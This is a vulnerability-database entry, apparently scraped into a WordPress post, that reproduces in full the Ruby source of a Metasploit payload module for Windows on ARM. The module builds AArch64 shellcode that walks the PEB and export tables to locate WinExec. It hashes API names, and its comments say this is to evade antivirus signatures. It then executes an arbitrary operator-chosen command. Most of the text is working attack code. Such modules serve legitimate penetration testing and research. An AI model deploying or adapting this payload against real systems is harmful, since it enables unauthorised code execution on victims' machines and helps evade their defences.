{“lastseen”:”2025-08-29T17:07:41″,”description”:”Executes an arbitrary command on a Windows on ARM (AArch64) target. This payload is a foundational example of…”,”published”:”2025-08-28T18:54:18″,”modified”:”2025-07-11T18:50:39″,”type”:”metasploit”,”title”:”Windows AArch64 Command Execution”,”source”:””,”references”:””,”id”:”MSF:PAYLOAD-WINDOWS-AARCH64-EXEC-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nmodule MetasploitModule\\n # This size is an approximation. The final size depends on the CMD string.\\n CachedSize = 352\\n\\n include Msf::Payload::Windows\\n include Msf::Payload::Single\\n\\n def initialize(info = {})\\n super(\\n merge_info(\\n info,\\n ‘Name’ =\\u003e ‘Windows AArch64 Command Execution’,\\n ‘Description’ =\\u003e %q{\\n Executes an arbitrary command on a Windows on ARM (AArch64) target.\\n This payload is a foundational example of position-independent shellcode for the AArch64 architecture.\\n It dynamically resolves the address of the `WinExec` function from `kernel32.dll` by parsing the\\n Process Environment Block (PEB) and the module’s Export Address Table (EAT) at runtime.\\n This technique avoids static imports and hardcoded function addresses, increasing resilience.\\n },\\n ‘Author’ =\\u003e [\\n ‘alanfoster’, # Original implementation and research\\n ‘Alexander \\”xaitax\\” Hagenah’ # Refactoring, Improvements and Optimization\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_AARCH64,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘CMD’, [true, ‘The command string to execute’, ‘calc.exe’])\\n ]\\n )\\n end\\n\\n def generate(_opts = {})\\n # The following AArch64 assembly implements the payload’s core logic.\\n # It is based on the alanfosters original implementation.\\n cmd_str = datastore[‘CMD’] || ‘calc.exe’\\n asm = \\u003c\\u003c~EOF\\n \/\/ AArch64 Windows PIC Shellcode\\n \/\/ —————————–\\n \/\/ Key Registers:\\n \/\/ x0-x7: Arguments to functions and return values.\\n \/\/ x18: Pointer to the Thread Environment Block (TEB) in user mode.\\n \/\/ x29: Frame Pointer (FP).\\n \/\/ x30: Link Register (LR), holds the return address for function calls.\\n\\n main:\\n \/\/ — Function Prologue —\\n \/\/ Establishes a stack frame according to the AArch64 ABI.\\n \/\/ Allocate 0xb0 (176) bytes on the stack for local variables, saved registers, and scratch space.\\n \/\/ Then store the caller’s frame pointer (x29) and link register (x30) at the new stack top.\\n stp x29, x30, [sp, #-0xb0]!\\n \/\/ Set our new frame pointer to the current stack pointer.\\n mov x29, sp\\n \/\/ Save non-volatile registers (x19-x21) that we will modify.\\n stp x19, x20, [x29, #0x10]\\n str x21, [x29, #0x20]\\n\\n \/\/ — API Hash Setup —\\n \/\/ Load the pre-calculated hash for kernel32.dll!WinExec into register w8.\\n \/\/ Hashing avoids using literal strings (\\”WinExec\\”) in the payload, which are\\n \/\/ common signatures for AV\/EDR.\\n movz w8, #0x8b31\\n movk w8, #0x876f, lsl #16\\n\\n api_call:\\n \/\/ — PEB Traversal —\\n \/\/ This section finds the base address of loaded modules (DLLs) in a\\n \/\/ position-independent way by walking structures internal to the process.\\n \/\/ x18 on Windows AArch64 always points to the Thread Environment Block (TEB).\\n ldr x10, [x18, #0x60] \/\/ x10 = TEB-\\u003eProcessEnvironmentBlock (PEB)\\n ldr x10, [x10, #0x18] \/\/ x10 = PEB-\\u003eLdr\\n ldr x10, [x10, #0x20] \/\/ x10 = PEB-\\u003eLdr.InMemoryOrderModuleList.Flink (points to first module entry)\\n\\n next_mod:\\n \/\/ — Module Name Hashing —\\n \/\/ For each module, calculate a hash of its name to find kernel32.dll.\\n ldr x11, [x10, #0x50] \/\/ x11 = LDR_DATA_TABLE_ENTRY-\\u003eFullDllName.Buffer pointer\\n ldr x12, [x10, #0x4a] \/\/ x12 = LDR_DATA_TABLE_ENTRY-\\u003eFullDllName.Length (USHORT)\\n and x12, x12, #0xffff \/\/ Ensure we only have the 16-bit length\\n movz w13, #0 \/\/ w13 = module hash accumulator, zero it out.\\n loop_modname:\\n \/\/ This hashing loop reads one byte at a time from the UTF-16 DLL name.\\n \/\/ It only uses the ASCII part for hashing and handles case-insensitivity.\\n ldrb w14, [x11], #1 \/\/ Read a byte and post-increment the pointer\\n cmp w14, #97 \/\/ Compare with ASCII ‘a’\\n b.lt not_lowercase\\n sub w14, w14, #0x20 \/\/ If lowercase, convert to uppercase\\n not_lowercase:\\n ror w13, w13, #13 \/\/ Rotate the hash accumulator right by 13 bits\\n add w13, w13, w14 \/\/ Add the character’s byte value to the hash\\n sub w12, w12, #1 \/\/ Decrement length counter\\n cmp w12, wzr\\n b.gt loop_modname\\n \/\/ These extra rotates are preserved from the original implementation to match the target hash.\\n ror w13, w13, #13\\n ror w13, w13, #13\\n\\n \/\/ Save the current module’s context (its LDR_DATA_TABLE_ENTRY pointer and its computed hash)\\n \/\/ to our stack frame before we start parsing its export table.\\n str x10, [x29, #0x30]\\n str w13, [x29, #0x38]\\n\\n \/\/ — PE Export Table Traversal —\\n ldr x10, [x10, #0x20] \/\/ x10 = DllBase (the module’s base memory address)\\n ldr w11, [x10, #0x3c] \/\/ Get e_lfanew offset from the DOS header\\n add x11, x10, x11 \/\/ x11 = Address of the main PE (NT) Header\\n\\n \/\/ — PE64 Magic Number Check —\\n \/\/ This check is a critical robustness feature. It ensures we only attempt to parse\\n \/\/ 64-bit PE modules, avoiding crashes if a 32-bit (WoW64) module is encountered.\\n \/\/ The PE32+ Magic (0x020B) is at Optional Header +0x18.\\n ldrh w14, [x11, #0x18] \/\/ Load the Magic number from the Optional Header\\n cmp w14, #0x020b \/\/ Compare with the PE32+ magic value for 64-bit\\n b.ne get_next_mod_loop \/\/ If it’s not a 64-bit module, skip it.\\n\\n ldr w11, [x11, #0x88] \/\/ Get Export Address Table (EAT) RVA from Optional Header\\n cmp x11, #0\\n b.eq get_next_mod_loop \/\/ If there’s no EAT, skip this module.\\n add x11, x11, x10 \/\/ x11 = EAT Virtual Address\\n str x11, [x29, #0x40] \/\/ Save EAT address to the stack\\n ldr w12, [x11, #0x18] \/\/ w12 = EAT.NumberOfNames\\n ldr w13, [x11, #0x20] \/\/ w13 = EAT.AddressOfNames RVA\\n add x13, x10, x13 \/\/ w13 = EAT.AddressOfNames Virtual Address\\n\\n get_next_func:\\n \/\/ — Function Name Hashing —\\n \/\/ Loop through all function names in the EAT.\\n cmp w12, #0\\n b.eq get_next_mod_loop \/\/ If all function names checked, move to the next module.\\n sub w12, w12, #1 \/\/ Decrement function counter (we search backwards)\\n mov x14, #4\\n madd x15, x12, x14, x13 \/\/ Calculate address of the current function name’s RVA in the name array\\n ldr w15, [x15] \/\/ Get the RVA of the function name string\\n add x15, x10, x15 \/\/ x15 = VA of the function name string\\n movz x5, #0 \/\/ w5 = function hash accumulator, zero it out.\\n loop_funcname:\\n ldrb w11, [x15], #1 \/\/ Load one byte of the ASCII function name\\n ror w5, w5, #13\\n add w5, w5, w11\\n cmp x11, #0\\n b.ne loop_funcname \/\/ Loop until the null terminator is hit.\\n funcname_hashed:\\n ldr w6, [x29, #0x38] \/\/ Retrieve the saved module hash from our stack frame\\n add w6, w6, w5 \/\/ Combined hash = module_hash + function_hash\\n cmp w6, w8 \/\/ Does this match our target hash (kernel32.dll!WinExec)?\\n b.ne get_next_func \/\/ If not, hash the next function name.\\n\\n \/\/ — Function Address Resolution —\\n \/\/ We found the correct function name. Now, we find its actual address.\\n found_func:\\n ldr x11, [x29, #0x40] \/\/ Restore EAT address from stack\\n ldr w13, [x11, #0x24] \/\/ Get EAT.AddressOfNameOrdinals RVA\\n add x13, x10, x13 \/\/ VA of the ordinal table\\n mov x14, #2\\n madd x15, x12, x14, x13 \/\/ Get address of our function’s ordinal\\n ldrh w15, [x15] \/\/ Get the 16-bit ordinal value\\n ldr w13, [x11, #0x1c] \/\/ Get EAT.AddressOfFunctions RVA\\n add x13, x10, x13 \/\/ VA of the function address table\\n mov x14, #4\\n madd x15, x15, x14, x13 \/\/ Get address of the function’s RVA from the address table using the ordinal\\n ldr w15, [x15] \/\/ Get the function’s RVA\\n add x15, x15, x10 \/\/ x15 = Final Virtual Address of WinExec\\n\\n finish:\\n \/\/ — Call WinExec —\\n \/\/ Set up x9 to point to a scratch buffer on our stack.\\n add x9, x29, #0x50\\n \/\/ create_aarch64_string_in_stack will write the command string to the\\n \/\/ address in x9 and place the final pointer to the string in x0.\\n #{create_aarch64_string_in_stack(cmd_str)}\\n mov w1, #1 \/\/ Arg2 (uCmdShow) = SW_SHOWNORMAL (1) – Makes the new window visible.\\n mov x8, x15 \/\/ Move target function address into a volatile register for the call.\\n blr x8 \/\/ Branch with Link to Register (call WinExec).\\n\\n \/\/ — Function Epilogue —\\n \/\/ Cleanly tears down the stack frame and returns execution to the caller.\\n epilogue:\\n \/\/ Restore saved non-volatile registers from the stack frame.\\n ldp x19, x20, [x29, #0x10]\\n ldr x21, [x29, #0x20]\\n \/\/ Restore the original stack pointer.\\n mov sp, x29\\n \/\/ Restore the caller’s frame pointer and link register, deallocating our stack frame in one instruction.\\n ldp x29, x30, [sp], #0xb0\\n ret \/\/ Return to the address stored in the Link Register.\\n\\n \/\/ — Loop Control for Module Iteration —\\n get_next_mod_loop:\\n \/\/ Restore the LDR_DATA_TABLE_ENTRY pointer from the stack.\\n ldr x10, [x29, #0x30]\\n \/\/ The InMemoryOrderModuleList is a circular doubly-linked list.\\n \/\/ Following the Flink pointer gets the next module in the list.\\n ldr x10, [x10]\\n \/\/ Jump back to begin processing this next module.\\n b next_mod\\n EOF\\n\\n compile_aarch64(asm)\\n end\\n\\n # Generates AArch64 assembly to write a given string to the stack and return a pointer to it.\\n # This is a classic shellcode technique to create strings in memory at runtime.\\n # @param string [String] The string to be placed on the stack.\\n # @return [String] A block of AArch64 assembly code.\\n def create_aarch64_string_in_stack(string)\\n str = string + \\”\\\\x00\\”\\n target = :x0 # The pointer to the string will be returned in x0 (first argument register).\\n stack = :x9 # x9 is used as a temporary pointer to write the string to the stack.\\n\\n # Build the string 8 bytes at a time.\\n push_string = str.bytes.each_slice(8).flat_map do |chunk|\\n # Load the 8-byte chunk into the target register using a sequence of movz\/movk.\\n mov_instructions = chunk.each_slice(2).with_index.map do |word, idx|\\n # NOTE: Chunks are reversed to build the little-endian value correctly in the register.\\n hex = word.reverse.map { |b| format(‘%02x’, b) }.join\\n \\”mov#{idx == 0 ? ‘z’ : ‘k’} #{target}, #0x#{hex}#{idx == 0 ? ” : \\”, lsl ##{idx * 16}\\”}\\”\\n end\\n # Store the 8-byte value from the register onto the stack and advance the stack pointer.\\n [*mov_instructions, \\”str #{target}, [#{stack}], #8\\”]\\n end\\n\\n # After writing, `stack` points just past the end of the string.\\n # We subtract the aligned size to get the pointer to the beginning of the string.\\n set_target_register = [\\n \\”mov #{target}, #{stack}\\”,\\n \\”sub #{target}, #{target}, ##{align(str.bytesize)}\\”\\n ]\\n (push_string + set_target_register).join(\\”\\\\n\\”)\\n end\\n\\n # Aligns a given value to a specified boundary (defaults to 8 bytes).\\n # @param value [Integer] The value to align.\\n # @param alignment [Integer] The alignment boundary.\\n # @return [Integer] The aligned value.\\n def align(value, alignment: 8)\\n return value if (value % alignment).zero?\\n\\n value + (alignment – (value % alignment))\\n end\\n\\n # Compiles a string of AArch64 assembly into raw binary shellcode.\\n # @param asm_string [String] The assembly code.\\n # @return [String] The compiled binary shellcode.\\n def compile_aarch64(asm_string)\\n # This requires the ‘aarch64’ gem.\\n require ‘aarch64\/parser’\\n parser = ::AArch64::Parser.new\\n asm = parser.parse(without_inline_comments(asm_string))\\n asm.to_binary\\n end\\n\\n # Removes all inline comments from an assembly string, as the aarch64\\n # gem parser does not support them.\\n # @param string [String] The assembly code with comments.\\n # @return [String] The assembly code without comments.\\n def without_inline_comments(string)\\n string.lines.map { |line| line.split(‘\/\/’, 2).first.strip }.reject(\\u0026:empty?).join(\\”\\\\n\\”)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/payloads\/singles\/windows\/aarch64\/exec.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/payload\/windows\/aarch64\/exec\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T17:07:41″,”description”:”Executes an arbitrary command on a Windows on ARM (AArch64) target. This payload is a foundational example of…”,”published”:”2025-08-28T18:54:18″,”modified”:”2025-07-11T18:50:39″,”type”:”metasploit”,”title”:”Windows AArch64 Command Execution”,”source”:””,”references”:””,”id”:”MSF:PAYLOAD-WINDOWS-AARCH64-EXEC-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-15027","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n